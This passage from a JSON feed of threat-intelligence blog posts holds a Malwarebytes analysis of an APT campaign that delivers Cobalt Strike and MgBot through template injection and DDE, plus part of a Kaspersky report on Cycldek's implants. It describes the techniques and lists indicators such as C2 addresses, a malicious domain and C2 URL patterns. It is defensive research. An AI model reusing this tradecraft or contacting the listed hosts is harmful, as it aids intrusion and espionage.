href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=tm25zXE3Ntc:BBFLRcVK7jQ:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/tm25zXE3Ntc\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-08-14T16:55:34", "published": "2017-08-14T09:55:00", "id": "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/tm25zXE3Ntc/when-combining-exploits-for-added.html", "title": "When combining exploits for added effect goes wrong", "type": "talosblog", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2018-8174"], "description": "_This blog post was authored by Hossein Jazi and J\u00e9r\u00f4me Segura_\n\nOn July 2, we found an archive file with an embedded document pretending to be from the government of India. This file used template injection to drop a malicious template which loaded a variant of Cobalt Strike. \n\nOne day later, the same threat actor changed their template and dropped a loader called MgBot, executing and injecting its final payload through the use of Application Management (AppMgmt) Service on Windows.\n\nOn July 5, we observed yet another archive file with an embedded document borrowing a statement about Hong Kong from UK's prime minister Boris Johnson. This document used the same TTPs to drop and execute the same payload.\n\nConsidering the ongoing tensions between India and China, as well as the new security laws over Hong Kong, we believe this new campaign is operated by a Chinese state-sponsored actor. Based on our analysis, we believe this may be a Chinese APT group that has been active since at least 2014.\n\n### Active targeting with different lures\n\nWe were able to track the activities related to these threat actors over the succession of several days based on unique phishing attempts designed to compromise their target.\n\n#### 'Mail security check' with Cobalt Strike (variant 1)\n\nThis campaign was most likely carried out through spear phishing emails. The .rar file (_Mail security check.rar_) includes a document with the same name (Figure 1). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/mailsecuritycheck-1.png> \"\" )Figure 1: Mail security check.docx\n\nThe document uses template injection to download a remote template from the following URL (Figure 2). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplate-1.png> \"\" )Figure 2: Template injection\n\nThe downloaded template uses the dynamic data exchange (DDE) protocol to execute malicious commands, which are encoded within the document's content (Figure 3).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-1.png> \"\" )Figure 3: Encoded command\n\nAfter decoding, we can see the list of commands that will be executed by DDE:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-1.png> \"\" )Figure 4: Decoded commands\n\nAs Figure 4 shows, the threat actors used _certutil _with_ -urlcache -split -f_ parameters to download a _com scriptlet_ from its server and then used the _[Squiblydoo](<https://car.mitre.org/analytics/CAR-2019-04-003/>)_ technique to execute the downloaded scriptlet via _regsvr32.exe _on the victim machine.\n\nThis scriptlet is stored in the _Documents_ directory as "ff.sct". The scriptlet is an XML file that has embedded VBscript (Figure 5). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/sct-file-1.png> \"\" )Figure 5: ff.sct snipplet\n\nThe scriptlet creates a VB macro and calls Excel to execute it. The macro has been obfuscated to bypass static security mechanism and is responsible for injecting the embedded payload into _rundll32.exe_ using the reflective DLL injection method. The injected payload is a variant of Cobalt Strike. \n\nThe following diagram shows the overall process of this attack:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.29.43-PM.png> \"\" )Figure 6: Overall process\n\n#### 'Mail security check' with MgBot (variant 2)\n\nAs we mentioned earlier, a day after the first attack, the APT group changed its remote template. In this new variant, the actors stopped using the Squiblydoo technique and Cobalt Strike as a payload. \n\nFigure 7 shows the new encoded commands embedded within the template file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-2-1.png> \"\" )Figure 7: Encoded command\n\nFigure 8 shows the list of commands that will be executed by DDE. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-2-1.png> \"\" )Figure 8: Decoded commands\n\nIn this new template file, the _storm.sct_ scriptlet was replaced with _storm.txt_. Similar to the previous version, _certutil_ is used to download the storm.txt file which is an executable stored in the Documents directory as ff.exe.\n\nThe following diagram shows the overall execution process:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.30.07-PM.png> \"\" )Figure 9: Overall execution process\n\n#### "Boris Johnson Pledges to Admit 3 Million From Hong Kong" with MgBot (variant 3)\n\nThe last document used by the Chinese APT group in this campaign focused on issues happening in Hong Kong. The file was embedded within an archive file named "Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.rar".\n\nThis document quotes the prime minister after a new security law was issued by China against Hong Kong (Figure 10). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/boris-1.png> \"\" )Figure 10: Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.\n\nSimilar to the other documents, it also uses template injection to download the remote template (Figure 11).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplteBoris-1.png> \"\" )Figure 11: Remote template \n\nThe downloaded template (BNOHK.docx) is similar to ADIN.docx (variant 2) in which it uses DDE to download and drop its loader. \n\n### Payload analysis: MgBot (BLame, Mgmbot)\n\nThe dropped executable (ff.exe) is a new variant of a loader called MgBot that drops and loads the final payload. This loader pretends to be a _Realtek Audio Manager tool_ (Figure 12).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.25-PM-300x115-1.png> \"\" )Figure 12: File version information\n\nIt has four embedded resources in which two of them are in Chinese Simplified language. This is an indicator that suggests this campaign is likely operated by a Chinese APT group. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.58-PM-2.png> \"\" )Figure 13: Resource language\n\nThe loader starts its process by escalating privilege through a UAC bypass using the [CMSTPLUA COM interface](<https://cqureacademy.com/cqure-labs/cqlabs-how-uac-bypass-methods-really-work-by-adrian-denkiewicz>).\n\nMgBot uses several anti-analysis and anti-virtualization techniques. The code is self modifying which means it alters its code sections during runtime. This makes static analysis of the sample harder.\n\nMgBot tries to avoid running in known virtualized environment such as _VmWare_,_ Sandboxie_ and _VirtualBox_. To identify if it's running in one of these environments, it looks for the following DLL files: _vmhgfs.dll_, _sbiedll.dll_ and _vboxogl.dll_ and if it finds any of these DLLs, it goes to an infinite loop without doing any malicious activity (Figure 14).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/virutalizationChecks-1.png> \"\" )Figure 14: Anti-VMs\n\nIt also checks for the presence of security products on the victim's machine and takes a different execution flow if a security product is detected. For example, it checks for _zhudongfangyu.exe, 360sd.exe, 360Tray.exe, MfeAVSvc.exe and McUICnt.exe _in different parts of the code (Figure 15). The malware does not perform all the checks at once and it rather checks a couple of them at different steps of its execution. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/av-1.png> \"\" )Figure 15: Security products checks\n\nTo invoke the required APIs, the malware does not call them directly but instead builds a function pointer table for the required APIs. Each request to an API call is made through the access to the relevant index of this table. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/apis-1.png> \"\" )Figure 16: Building function pointer table\n\nAs an example, when the malware needs to invoke _WinExec_, it does so by invoking it through its index from the function pointer table.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/winexec-1.png> \"\" )Figure 17: Calling API through use of function pointer table\n\nAfter building the required API calls table, the malware performs the following procedures: \n\n * It calls _CreateFileW_ to create _iot7D6E.tmp_ (random name starting with iot) into the _%APPDATA%Temp_ directory. This tmp file is a cab file that embedds the final payload.\n * It calls _WriteFile_ to populate its content\n * It calls _CreateProcessInternalW_ to invoke _expand.exe_ to decompress the content of _iot7D6E.tmp_ into _ProgramData\\Microsoft\\PlayReady\\MSIBACF.tmp\\tmp.dat_ (the _MSIBACF.tmp_ directory name is generated randomly and starts with MSI and then is followed by a combination of random numbers and characters)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/expand-1.png> \"\" )Figure 18: Calling expand.exe\n\n * It calls _CopyFileW_ to copy tmp.dat into _pMsrvd.dll_\n * It calls _DeleteFileW_ to delete _tmp.dat_\n * It drops _DBEngin.EXE_ and _WUAUCTL.EXE_ in the _ProgramData\\Microsoft\\PlayReady_ directory. Both of these files are _rundll32.exe_ that is used later to execute the dropped DLL.\n * It modifies the registry hive of of _HKLM\\SYSTEM\\CurrentControlSet\\Services\\AppMgmt_ registry location to make itself persistent. To perform this modification, it drops two registry files named iix*.tmp (random numbers have been added to iix) into the %APPDATA%Temp directory which are the old and new registry hives for the mentioned registry location.\n\nTo load the dropped DLL (_pMsrvd.dll_) the loader registers it as a service. To achieve this, it makes use of the already installed service, AppMgmt, to load the payload as shown in the following images:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/reg2new-1.png> \"\" )Figure 18: ServiceDll\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/regnew1-1.png> \"\" )Figure 19: ImagePath\n\nFinally, it executes the dropped DLL by running_ net start AppMgmt_. After loading the DLL, the Loader creates a cmd file (_lgt*.tmp_.cmd) in the _%APPDATA%TEMP _directory with the content shown in Figure 20. Then it executes it to delete the cmd file and loader from the victim's machine. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/cmdnew-1.png> \"\" )Figure 20: cmd file\n\nWe were able to identify several different variants of this loader. In general, all the variants drop the final payload using _expand.exe_ or _extrac32.exe _and then use "net start _AppMgmt_" or "net start StiSvc" to execute the dropped DLL with one of the following configurations:\n\n * svchost.exe -k netsvcs -p -s AppMgmt\n * svchost.exe -k netsvcs\n * svchost.exe -k imgsvc\n\nThe dropped DLL is the main payload used by this threat actor to perform malicious activities. The following shows the file version information pretending to be a _Video Team Desktop App. _\n\nFigure 21: File info\n\nThe creation time for this DLL appears to be "2008-04-26 16:41:12". However, based on Rich header data, we can assert that this might have been tampered with by the threat actor. \n\nFigure 22: Rich header\n\nThe DLL has eight export functions with carefully selected names to pretend they are doing normal tasks. It can check the running services and based on that can inject itself into the memory space of WmiPrvSE.exe. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmicode-1.png> \"\" )Figure 23: Injection into WmiPrvse.exe\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmi-1.png> \"\" )Figure 24: RAT's DLL is injected into memory space of WmiPrvse.exe\n\nIt uses several anti-debugging and anti-virtualization techniques to detect if it's running in a virtualized environment or if it is being debugged by a debugger. It uses _GetTickCount_ and _QueryPerformanceCounter_ API calls to detect the debugger environment.\n\nTo detect if it is running in a virtual environment, it uses anti-vm detection instructions such as _sldt_ and _cpid_ that can provide information about the processor and also checks Vmware IO ports (VMXH).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/type-510x600-1.png> \"\" )Figure 25: Environment Detection\n\nAll the strings used by this RAT are either obfuscated or XOR encoded to make its analysis hard. \n\nThis final piece of code bundled in MgBot is a Remote Administration Trojan with several capabilities such as: \n\n * C2 communication over TCP (42.99.116[.]225:12800)\n * Ability to take screenshots\n * Keylogging\n * File and directory management\n * Process management\n * Create MUTEX\n\n### Infrastructure relations\n\nThe following shows the infrastructure used by this APT and relations between hosts used by this group. This APT group has used several different IP addresses to host its malicious payloads and also for its C2 communications.\n\nWhat is interesting is that the majority of IP addresses used by this APT are located in Hong Kong and almost all of these Hong Kong-based IP addresses are used for C2 communication. Even in their past campaigns they mostly have used infrastructure in Hong Kong. The graph also shows the relationship between different IP addresses used by this APT group.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/VT-1-1.png> \"\" )Figure 26: Infrastructure connections\n\n### Android RAT\n\nWe also found several malicious Android applications we believe are part of the toolset used by this APT group. Malwarebytes detects them as _Android/Trojan.Spy.AndroRat.KSRemote_.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/android-1.png> \"\" )Figure 27: Malicious Android APK\n\nAll these bogus applications contain a jar file named _[ksremote.jar](<https://www.virustotal.com/gui/file/5f76192e952fd0002c1df4b66423ae803536ad82a1ae36bc9bfc6f73a7093b7f/detection>)_ that provides the RAT functionality:\n\n * Recording screen and audio using the phone'ss camera/mic\n * Locating phone with coordinates\n * Stealing phone contacts, call log, SMS, web history\n * Sending SMS messages\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/contacts-1.png> \"\" )Figure 28: Contact grabbing capability\n\nThis RAT communicates with C&C servers using random port numbers within the 122.10.89.170 to 179 range (all in Hong Kong)\n\n * 122.10.89[.]172:10560\n * 122.10.89[.]170:9552\n * 122.10.89[.]172:10560\n\n### TTPs in line with Chinese APTs\n\nThe lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China.\n\nThe TTPs observed in these attacks have been used by several Chinese APT groups:\n\n * [Rancor](<https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/>) APT is known to use Certutil to download their payload\n * [KeyBoy](<https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html>) is known to have used DDE is its previous campaigns\n * APT40 has utilized [Squiblydoo](<https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets>) and [template injection](<https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign>) in its previous campaigns. \n\nConsidering these factors we attribute this APT attack with moderate confidence to a new Chinese APT group. Based on the TTPs used by this APT group we were able to track back its activities to at least 2014. In all their campaigns the actor has used a variant of MgBot.\n\n### A threat actor with a long documented history\n\nA [Needle in a haystack](<https://www.virusbulletin.com/virusbulletin/2014/02/needle-haystack>) blog post from 2014 detailed a campaign that drops a Trojan disguised as a legitimate MP3 encoder library. In this campaign the actor used [CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) to drop its Trojan. The rest of the TTPs including the methods used by the threat actor to execute MgBot and registry modifications are similar to this ongoing campaign. \n\nIn 2018, this group performed another operation in which they used a VBScript vulnerability ([CVE-2018-8174)](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>) to [initiate their attack ](<http://771a8f83a0c6f08b2060d86fcbd40d36ee3a681beadb32ff6f288e2648c64bf9>)to drop a variants of MgBot. In March 2020, an archive file ([warning.rar](<http://bc85b5b1e69728b01e64266506904eacd6bbc1bf60a5e631cb35327e494f9815>)) was submitted to VirusTotal that we believe is part of another campaign used by this actor.\n\nWe will continue this group's activities to see if their targeting or techniques evolve. Malwarebytes users are protected from this campaign thanks to our signature-less anti-exploit layer.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/nebula_.png> \"\" )Figure 29: Malwarebytes Nebula blocking malicious Word document\n\n### MITRE ATT&CK techniques\n\n**Tactic**| **ID**| **Name**| **Details** \n---|---|---|--- \nExecution| [T1059](<https://attack.mitre.org/techniques/T1059>)| Command-Line Interface| Starts CMD.EXE for commands execution \n\ufeff| [T1106](<https://attack.mitre.org/techniques/T1106>)| Execution through Module Load| Loads dropped or rewritten executable \n- WUAUCTL.EXE \n- svchost.exe \n- rundll32.exe \n\ufeff| [T1053](<https://attack.mitre.org/techniques/T1053>)| Rundll32| Uses RUNDLL32.EXE to load library \n\ufeff| [T1064](<https://attack.mitre.org/techniques/T1064>)| Scripting| WScript.exe: Starts MSHTA.EXE for opening HTA or HTMLS files \n\ufeff| [](<https://attack.mitre.org/techniques/T1204>)[T1035](<https://attack.mitre.org/techniques/T1035>)| service execution| Starts NET.EXE for service management \n| [T1170 ](<https://attack.mitre.org/techniques/T1170>)| mshta| Starts MSHTA.EXE for opening HTA or HTMLS files \n| [T1086](<https://attack.mitre.org/techniques/T1086>)| PowerShell| Executes PowerShell scripts \nPrivilege Escalation| [T1050](<https://attack.mitre.org/techniques/T1050>)| new service| Creates or modifies windows services through rundll32.exe \n\ufeff| [T1088](<https://attack.mitre.org/techniques/T1088>)| Bypass UAC| Known privilege escalation attack through DllHost.exe \nPersistence| [T1031](<https://attack.mitre.org/techniques/T1031>)| Modify Existing Service| Creates or modifies windows services through rundll32.exe \n| [T1050](<https://attack.mitre.org/techniques/T1050>)| new services| Creates or modifies windows services through rundll32.exe \nDefense Evasion| [](<https://attack.mitre.org/techniques/T1107>)[T1107](<https://attack.mitre.org/techniques/T1107>)| File Deletion| Starts CMD.EXE for self-deleting \n\ufeff| [T1085 ](<https://attack.mitre.org/techniques/T1085>)| Rundll32| Uses RUNDLL32.EXE to load library \n| [T1088](<https://attack.mitre.org/techniques/T1088>)| bypass UAC| Known privilege escalation attack through DllHost.exe \n| [T1497](<https://attack.mitre.org/techniques/T1497/>)| Virtualization/Sandbox Evasion| The Loader uses several anti-virtualization detections techniques \n| [T1221](<https://attack.mitre.org/techniques/T1221/>)| Template Injection| Maldoc uses template injection to download remote template \n| [T1218](<https://attack.mitre.org/techniques/T1218/>)| Signed Binary Proxy Execution| Use Squiblydoo to load executable \nDiscovery| [T1012](<https://attack.mitre.org/techniques/T1012>)| Query Registry| Reads the machine GUID from the registry \n| [T1082](<https://attack.mitre.org/techniques/T1082>)| System Information Discovery| Reads the machine GUID from the registry \n| [T1007](<https://attack.mitre.org/techniques/T1007>)| System Service Discovery| Starts NET.EXE for service management \nLateral Movement| [T1105](<https://attack.mitre.org/techniques/T1105>)| Remote File Copy| - certutil.exe: Downloads executable files from the Internet \n- cmd.exe: Starts CertUtil for downloading files \nC&C | [T1105](<https://attack.mitre.org/techniques/T1105>)| Remote File Copy| - certutil.exe: Downloads executable files from the Internet \n - cmd.exe: Starts CertUtil for downloading files \nTable 1: Mitre Attack TTPs\n\n### IOCs\n\n**2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a** Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.docx\n\n**fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc** BNOHK.docx.zip\n\n**3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790** Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar\n\n**ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03** Email security check.rar\n\n**1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6** Email security check.docx\n\n**3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b** ADIN.docx (storm.sct)\n\n**855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8** ADIN.docx (storm.sct)\n\n**1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585** ff.exe (storm.txt)\n\n**99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a** cobalt strike\n\n**flash.governmentmm.com**: This domain used by actor to host remote templates. It has been registered 3 month ago by someone in United States.\n\n**MgBot samples**\n\n2310f3d779acdb4881b5014f4e57dd65b4d6638fd011ac73e90df729b58ae1e0 \ne224d730e66931069d6760f2cac97ab0f62d1ed4ddec8b58783237d3dcd59468 \n5b0c93a70032d80c1f5f61e586edde6360ad07b697021a83ed75481385f9f51f \n1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585 \n07bb016c3fde6b777be4b43f293cacde2d3aae0d4e4caa15e7c66835e506964f \n7bdfabdf9a96b3d941f90ec124836084827f6ef06fadf0dce1ae35c2361f1ac6 \n8ab344a1901d8129d99681ce33a76f7c64fd95c314ac7459c4b1527c3d968bb4 \nf41bfc57c2681d94bf102f39d4af022beddafb4d49a49d7d7c1901d14eb698d2\n\n**45.77.245[.]0: **This IP has been used by Cobalt Strike as a C&C server. \n\n**42.99.116[.]225**: C&C server used by final Payload.\n\n**Android samples**\n\nb5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77 \n9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846 \n5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46\n\nThe post [Chinese APT group targets India and Hong Kong using new variant of MgBot malware](<https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2020-07-21T15:00:00", "published": "2020-07-21T15:00:00", "id": "MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "href": "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", "type": "malwarebytes", "title": "Chinese APT group targets India and Hong Kong using new variant of MgBot malware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-06-03T11:50:54", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** | \n---|---|---|--- \nInitial Infection Vector | RTF documents | Unknown | \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) | \nSide-Loaded DLL | QcLite.dll | wsc.dll | \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary | \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe | \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or\n\nC:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini | \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},\n\n{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},\n\n{E68DFA68-1132-4A32-ADE2-8C87F282C457},\n\n{728264DE-3701-419B-84A4-2AD86B0C43A3},\n\n{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},\n\n{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} | \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s\n\nor\n\nhttp://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s | \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures 